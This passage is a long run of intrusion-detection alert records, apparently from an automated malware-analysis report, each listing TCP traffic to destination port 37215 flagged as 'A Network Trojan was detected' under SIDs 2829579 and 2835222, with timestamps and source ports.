            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434457
            SID:2829579
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486020
            SID:2835222
            Source Port:34228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.781943
            SID:2835222
            Source Port:55324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717616
            SID:2829579
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470377
            SID:2829579
            Source Port:52148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746145
            SID:2829579
            Source Port:46104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872340
            SID:2835222
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385489
            SID:2829579
            Source Port:56642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706541
            SID:2835222
            Source Port:46210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764838
            SID:2829579
            Source Port:36308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979456
            SID:2835222
            Source Port:45304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877596
            SID:2829579
            Source Port:57216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019874
            SID:2835222
            Source Port:34404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.942670
            SID:2835222
            Source Port:53904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251881
            SID:2835222
            Source Port:45012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342661
            SID:2829579
            Source Port:43552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322519
            SID:2829579
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.882709
            SID:2835222
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058101
            SID:2835222
            Source Port:42528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066788
            SID:2829579
            Source Port:57768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572110
            SID:2829579
            Source Port:39200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053939
            SID:2829579
            Source Port:46430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333729
            SID:2835222
            Source Port:42230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289576
            SID:2835222
            Source Port:38454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944333
            SID:2835222
            Source Port:44058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767476
            SID:2829579
            Source Port:43184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.328230
            SID:2829579
            Source Port:56276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861222
            SID:2835222
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861813
            SID:2829579
            Source Port:39076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773761
            SID:2835222
            Source Port:36152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936356
            SID:2829579
            Source Port:42892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307249
            SID:2835222
            Source Port:53016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733489
            SID:2835222
            Source Port:58408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371232
            SID:2829579
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919247
            SID:2835222
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881060
            SID:2835222
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066532
            SID:2835222
            Source Port:39704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853313
            SID:2829579
            Source Port:39608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508139
            SID:2835222
            Source Port:48022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847011
            SID:2829579
            Source Port:42800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734303
            SID:2829579
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851255
            SID:2829579
            Source Port:34758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770630
            SID:2835222
            Source Port:58108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776719
            SID:2835222
            Source Port:35986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854377
            SID:2829579
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020548
            SID:2829579
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507034
            SID:2835222
            Source Port:57134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756920
            SID:2835222
            Source Port:42364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557415
            SID:2835222
            Source Port:48036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058147
            SID:2829579
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759974
            SID:2835222
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060045
            SID:2829579
            Source Port:43894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302064
            SID:2835222
            Source Port:40460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900378
            SID:2829579
            Source Port:60248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993899
            SID:2829579
            Source Port:44328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804122
            SID:2835222
            Source Port:38978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934013
            SID:2829579
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868335
            SID:2829579
            Source Port:35046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759628
            SID:2829579
            Source Port:43086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445145
            SID:2835222
            Source Port:59518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862245
            SID:2835222
            Source Port:36854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871726
            SID:2835222
            Source Port:32938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953417
            SID:2835222
            Source Port:51674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998847
            SID:2835222
            Source Port:46926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559109
            SID:2835222
            Source Port:42360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290792
            SID:2829579
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809754
            SID:2835222
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547527
            SID:2829579
            Source Port:48540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746998
            SID:2835222
            Source Port:37264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059831
            SID:2829579
            Source Port:59250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780618
            SID:2835222
            Source Port:56920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767663
            SID:2829579
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048152
            SID:2835222
            Source Port:58002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925478
            SID:2835222
            Source Port:53814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.385579
            SID:2835222
            Source Port:37340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925068
            SID:2835222
            Source Port:60880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865310
            SID:2835222
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231133
            SID:2829579
            Source Port:51102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041132
            SID:2835222
            Source Port:38756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679996
            SID:2829579
            Source Port:54164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004846
            SID:2829579
            Source Port:59508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995150
            SID:2835222
            Source Port:46068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753250
            SID:2829579
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916744
            SID:2829579
            Source Port:39022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865331
            SID:2829579
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868541
            SID:2829579
            Source Port:49450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.959865
            SID:2829579
            Source Port:32956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756839
            SID:2829579
            Source Port:53588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821760
            SID:2835222
            Source Port:50290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940233
            SID:2829579
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.640164
            SID:2835222
            Source Port:38108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467346
            SID:2835222
            Source Port:55942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842720
            SID:2829579
            Source Port:45650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066755
            SID:2835222
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510173
            SID:2829579
            Source Port:37422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.836065
            SID:2835222
            Source Port:44986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443897
            SID:2829579
            Source Port:45928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443712
            SID:2835222
            Source Port:33982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.250985
            SID:2835222
            Source Port:42626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868447
            SID:2835222
            Source Port:53198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943353
            SID:2835222
            Source Port:37812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052269
            SID:2835222
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617891
            SID:2835222
            Source Port:45918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898275
            SID:2829579
            Source Port:33704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368466
            SID:2829579
            Source Port:50218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.573911
            SID:2835222
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507441
            SID:2829579
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277462
            SID:2835222
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759909
            SID:2835222
            Source Port:36198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789635
            SID:2835222
            Source Port:50048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856295
            SID:2829579
            Source Port:39992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681594
            SID:2829579
            Source Port:52060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414315
            SID:2829579
            Source Port:49974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463578
            SID:2835222
            Source Port:56238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.655752
            SID:2835222
            Source Port:45240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318171
            SID:2829579
            Source Port:33948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071049
            SID:2829579
            Source Port:46132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934213
            SID:2835222
            Source Port:44838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860834
            SID:2835222
            Source Port:56796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020987
            SID:2835222
            Source Port:58110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485545
            SID:2835222
            Source Port:40272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556391
            SID:2835222
            Source Port:32900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610949
            SID:2829579
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929847
            SID:2829579
            Source Port:37516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597295
            SID:2829579
            Source Port:46094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951730
            SID:2835222
            Source Port:46454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805519
            SID:2835222
            Source Port:35452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843006
            SID:2835222
            Source Port:60276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955799
            SID:2835222
            Source Port:53596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920251
            SID:2829579
            Source Port:49438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831701
            SID:2835222
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917605
            SID:2835222
            Source Port:56698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997577
            SID:2829579
            Source Port:57810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841969
            SID:2829579
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935046
            SID:2829579
            Source Port:48802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424156
            SID:2829579
            Source Port:44600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918811
            SID:2829579
            Source Port:58642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070069
            SID:2829579
            Source Port:60448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299991
            SID:2829579
            Source Port:35720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807582
            SID:2835222
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597345
            SID:2829579
            Source Port:36500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870456
            SID:2835222
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986336
            SID:2829579
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871166
            SID:2829579
            Source Port:44358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052023
            SID:2829579
            Source Port:53620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261341
            SID:2835222
            Source Port:44466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899849
            SID:2829579
            Source Port:36082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930173
            SID:2835222
            Source Port:51564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451556
            SID:2835222
            Source Port:40366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858629
            SID:2835222
            Source Port:38710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278214
            SID:2829579
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827379
            SID:2829579
            Source Port:56368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864385
            SID:2829579
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995274
            SID:2835222
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687669
            SID:2829579
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746295
            SID:2829579
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919340
            SID:2829579
            Source Port:35616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581829
            SID:2829579
            Source Port:46318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788900
            SID:2835222
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756860
            SID:2829579
            Source Port:33812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510136
            SID:2835222
            Source Port:33426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147575
            SID:2835222
            Source Port:58182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318202
            SID:2829579
            Source Port:45266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782908
            SID:2829579
            Source Port:53272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047999
            SID:2829579
            Source Port:42088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879620
            SID:2829579
            Source Port:49606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853299
            SID:2829579
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869956
            SID:2829579
            Source Port:36978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.810437
            SID:2829579
            Source Port:55902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850356
            SID:2835222
            Source Port:37590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542539
            SID:2835222
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904773
            SID:2835222
            Source Port:53000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612074
            SID:2835222
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777046
            SID:2835222
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398346
            SID:2835222
            Source Port:42316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.910994
            SID:2835222
            Source Port:41374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918900
            SID:2835222
            Source Port:60192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291563
            SID:2835222
            Source Port:47262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901496
            SID:2829579
            Source Port:60270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782336
            SID:2829579
            Source Port:51482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555164
            SID:2835222
            Source Port:48842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.732150
            SID:2829579
            Source Port:45928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775617
            SID:2829579
            Source Port:55174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922941
            SID:2829579
            Source Port:60556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717197
            SID:2835222
            Source Port:37564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966478
            SID:2835222
            Source Port:56478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.571960
            SID:2829579
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037824
            SID:2835222
            Source Port:37614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644104
            SID:2835222
            Source Port:44950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459556
            SID:2829579
            Source Port:52152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810582
            SID:2835222
            Source Port:51462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001606
            SID:2829579
            Source Port:47726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064799
            SID:2835222
            Source Port:57126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559742
            SID:2829579
            Source Port:48122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979494
            SID:2829579
            Source Port:39844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745696
            SID:2835222
            Source Port:38384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893058
            SID:2829579
            Source Port:59992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
